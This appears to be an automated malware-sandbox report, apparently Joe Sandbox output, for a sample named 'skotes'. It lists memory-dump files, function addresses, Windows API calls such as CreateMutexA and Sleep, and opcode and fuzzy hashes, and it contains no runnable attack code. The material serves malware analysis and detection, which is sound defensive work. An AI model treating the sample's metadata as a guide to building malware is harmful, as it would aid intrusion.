Associated: 00000007.00000002.1350080534.00000000005C6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350121843.00000000005CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350160524.00000000005D0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350184629.00000000005D3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350208328.00000000005DB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350229729.00000000005DD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350247962.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350270708.00000000005E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350292941.00000000005EA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350317217.00000000005F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350339485.00000000005F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350368967.00000000005FB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350407915.000000000061C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000061D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000063C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350495838.0000000000653000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350521029.0000000000654000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350541432.000000000066D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350558762.000000000066E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350576645.0000000000672000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350595688.0000000000674000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350614602.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350638385.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_360000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2<
API String ID: 1464230837-1458272136
Opcode ID: 8a36c9409de325b2a7b9e6fffb633a6957eef1690f5fa4ab2b4b1e023b173423
Instruction ID: e0656735b33944c5dc507996b0c43836737e4c4a2703c51ebda5ac57c4255c8d
Opcode Fuzzy Hash: 8a36c9409de325b2a7b9e6fffb633a6957eef1690f5fa4ab2b4b1e023b173423
Instruction Fuzzy Hash: E52149326082049BEB1AAF68DCC5B6DB7A5EFC1314F20C619E408DB2D9D77599908B12

Function 0036A856 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0036A963
CreateMutexA.KERNELBASE(00000000,00000000,003C3254), ref: 0036A981

Strings

T2<, xrefs: 0036A970

Memory Dump Source

Source File: 00000007.00000002.1349075912.0000000000361000.00000040.00000001.01000000.00000008.sdmp, Offset: 00360000, based on PE: true

Associated: 00000007.00000002.1348944484.0000000000360000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349075912.00000000003C2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349341043.00000000003C9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349392384.00000000003CB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349432597.00000000003D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349590933.0000000000538000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349634365.000000000053A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000054F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000055D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349723424.0000000000563000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349773896.0000000000567000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349802663.0000000000570000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349830103.0000000000577000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349910260.000000000058F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349933176.0000000000591000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349956414.0000000000598000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349995691.00000000005A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350026946.00000000005BC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350057599.00000000005BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350080534.00000000005C6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350121843.00000000005CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350160524.00000000005D0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350184629.00000000005D3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350208328.00000000005DB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350229729.00000000005DD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350247962.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350270708.00000000005E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350292941.00000000005EA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350317217.00000000005F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350339485.00000000005F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350368967.00000000005FB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350407915.000000000061C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000061D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000063C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350495838.0000000000653000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350521029.0000000000654000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350541432.000000000066D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350558762.000000000066E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350576645.0000000000672000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350595688.0000000000674000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350614602.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350638385.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_360000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2<
API String ID: 1464230837-1458272136
Opcode ID: a178dbeebe7ce46bb19be60b059794298516b371a3cd0f9c413b3a1176d97528
Instruction ID: 20276452160f118421a92b33c50bd0995c973e40fd44bea9a977c891121b5239
Opcode Fuzzy Hash: a178dbeebe7ce46bb19be60b059794298516b371a3cd0f9c413b3a1176d97528
Instruction Fuzzy Hash: 72217F312596009AFB276B68C886B7DB655EFC1304F24CC16E104FB2C9CB7A98408A93

Function 0036A34F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0036A963
CreateMutexA.KERNELBASE(00000000,00000000,003C3254), ref: 0036A981

Strings

T2<, xrefs: 0036A970

Memory Dump Source

Source File: 00000007.00000002.1349075912.0000000000361000.00000040.00000001.01000000.00000008.sdmp, Offset: 00360000, based on PE: true

Associated: 00000007.00000002.1348944484.0000000000360000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349075912.00000000003C2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349341043.00000000003C9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349392384.00000000003CB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349432597.00000000003D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349590933.0000000000538000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349634365.000000000053A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000054F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000055D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349723424.0000000000563000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349773896.0000000000567000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349802663.0000000000570000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349830103.0000000000577000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349910260.000000000058F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349933176.0000000000591000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349956414.0000000000598000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349995691.00000000005A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350026946.00000000005BC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350057599.00000000005BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350080534.00000000005C6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350121843.00000000005CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350160524.00000000005D0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350184629.00000000005D3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350208328.00000000005DB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350229729.00000000005DD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350247962.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350270708.00000000005E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350292941.00000000005EA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350317217.00000000005F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350339485.00000000005F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350368967.00000000005FB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350407915.000000000061C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000061D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000063C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350495838.0000000000653000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350521029.0000000000654000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350541432.000000000066D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350558762.000000000066E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350576645.0000000000672000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350595688.0000000000674000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350614602.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350638385.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_360000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2<
API String ID: 1464230837-1458272136
Opcode ID: 7962ee4a72c0fe662dbe6c5e4b8a56f8f76bfa814d706c46ecb04e58000c3276
Instruction ID: 185fce2ac3505358db9801dfe54088dc13288136a6f9bc0f90b8739d2f74d742
Opcode Fuzzy Hash: 7962ee4a72c0fe662dbe6c5e4b8a56f8f76bfa814d706c46ecb04e58000c3276
Instruction Fuzzy Hash: 05216A326446049BEB1AAF28DC8576CB775DF81310F30C619E408EB7D8C77595808B52

Function 0039D82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0039A813,00000001,00000364,00000006,000000FF,?,0039EE3F,?,00000004,00000000,?,?), ref: 0039D871

Memory Dump Source

Source File: 00000007.00000002.1349075912.0000000000361000.00000040.00000001.01000000.00000008.sdmp, Offset: 00360000, based on PE: true

Associated: 00000007.00000002.1348944484.0000000000360000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349075912.00000000003C2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349341043.00000000003C9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349392384.00000000003CB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349432597.00000000003D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349590933.0000000000538000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349634365.000000000053A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000054F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000055D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349723424.0000000000563000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349773896.0000000000567000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349802663.0000000000570000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349830103.0000000000577000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349910260.000000000058F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349933176.0000000000591000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349956414.0000000000598000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349995691.00000000005A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350026946.00000000005BC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350057599.00000000005BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350080534.00000000005C6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350121843.00000000005CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350160524.00000000005D0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350184629.00000000005D3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350208328.00000000005DB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350229729.00000000005DD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350247962.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350270708.00000000005E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350292941.00000000005EA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350317217.00000000005F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350339485.00000000005F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350368967.00000000005FB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350407915.000000000061C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000061D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000063C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350495838.0000000000653000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350521029.0000000000654000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350541432.000000000066D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350558762.000000000066E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350576645.0000000000672000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350595688.0000000000674000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350614602.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350638385.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_360000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0accb103a644261101c416f531fe3ba2bf145dfd75110bd31aaf19cf5645cf2a
Instruction ID: 9d9899010df1324e02b3968a419351cbb29c0e14c1eb7f299ddd69caa21006ca
Opcode Fuzzy Hash: 0accb103a644261101c416f531fe3ba2bf145dfd75110bd31aaf19cf5645cf2a
Instruction Fuzzy Hash: F0F0E93160913466DF233A769C07B5B3758DF85370B168521ED049B183DA20DC0082E0

Non-executed Functions

Function 00362EC0 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00362F5F
GetCurrentThreadId.KERNEL32 ref: 00362F7E
__Mtx_unlock.LIBCPMT ref: 00362FCC
__Cnd_broadcast.LIBCPMT ref: 00362FE3
__Mtx_unlock.LIBCPMT ref: 003630F5
GetCurrentThreadId.KERNEL32 ref: 00363132
__Mtx_unlock.LIBCPMT ref: 0036319B

Memory Dump Source

Source File: 00000007.00000002.1349075912.0000000000361000.00000040.00000001.01000000.00000008.sdmp, Offset: 00360000, based on PE: true

Associated: 00000007.00000002.1348944484.0000000000360000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349075912.00000000003C2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349341043.00000000003C9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349392384.00000000003CB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349432597.00000000003D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349590933.0000000000538000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349634365.000000000053A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000054F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000055D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349723424.0000000000563000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349773896.0000000000567000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349802663.0000000000570000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349830103.0000000000577000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349910260.000000000058F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349933176.0000000000591000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349956414.0000000000598000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349995691.00000000005A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350026946.00000000005BC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350057599.00000000005BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350080534.00000000005C6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350121843.00000000005CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350160524.00000000005D0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350184629.00000000005D3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350208328.00000000005DB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350229729.00000000005DD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350247962.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350270708.00000000005E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350292941.00000000005EA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350317217.00000000005F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350339485.00000000005F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350368967.00000000005FB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350407915.000000000061C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000061D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000063C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350495838.0000000000653000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350521029.0000000000654000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350541432.000000000066D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350558762.000000000066E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350576645.0000000000672000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350595688.0000000000674000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350614602.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350638385.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_360000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
String ID:
API String ID: 57040152-0
Opcode ID: 3a9ed22c2fd341880ac9a7522ddf896e86c9e13681815e56384d762ebfe941e6
Instruction ID: 3b03e638b93420925b091bc582ec4e0830c72fc979aabebfa8b7869eb25dec8d
Opcode Fuzzy Hash: 3a9ed22c2fd341880ac9a7522ddf896e86c9e13681815e56384d762ebfe941e6
Instruction Fuzzy Hash: 0DA1E4B0A016059FDB22DF64C84479AB7B8FF15314F05C52DE81AEB641EB35EA08CBD1

Function 0039CBDF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0039CC66

Strings

v9, xrefs: 0039CBE1

Memory Dump Source

Source File: 00000007.00000002.1349075912.0000000000361000.00000040.00000001.01000000.00000008.sdmp, Offset: 00360000, based on PE: true

Associated: 00000007.00000002.1348944484.0000000000360000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349075912.00000000003C2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349341043.00000000003C9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349392384.00000000003CB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349432597.00000000003D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349590933.0000000000538000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349634365.000000000053A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000054F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000055D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349723424.0000000000563000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349773896.0000000000567000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349802663.0000000000570000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349830103.0000000000577000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349910260.000000000058F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349933176.0000000000591000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349956414.0000000000598000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349995691.00000000005A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350026946.00000000005BC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350057599.00000000005BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350080534.00000000005C6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350121843.00000000005CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350160524.00000000005D0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350184629.00000000005D3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350208328.00000000005DB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350229729.00000000005DD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350247962.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350270708.00000000005E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350292941.00000000005EA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350317217.00000000005F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350339485.00000000005F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350368967.00000000005FB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350407915.000000000061C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000061D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000063C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350495838.0000000000653000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350521029.0000000000654000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350541432.000000000066D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350558762.000000000066E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350576645.0000000000672000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350595688.0000000000674000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350614602.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350638385.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_360000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID: v9
API String ID: 3213747228-3260138212
Opcode ID: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
Instruction ID: ec0ffafc11a6ef6101f12a42eb61f50687ec858189b379b8a41b381153e9be81
Opcode Fuzzy Hash: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
Instruction Fuzzy Hash: 34B12432D246859FDF16CF28C8917BEBFE5EF4A340F15516AE855EB242D6348D02CB60

Function 0037BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0037BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 0037BBE4
_xtime_get.LIBCPMT ref: 0037BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 0037BC13

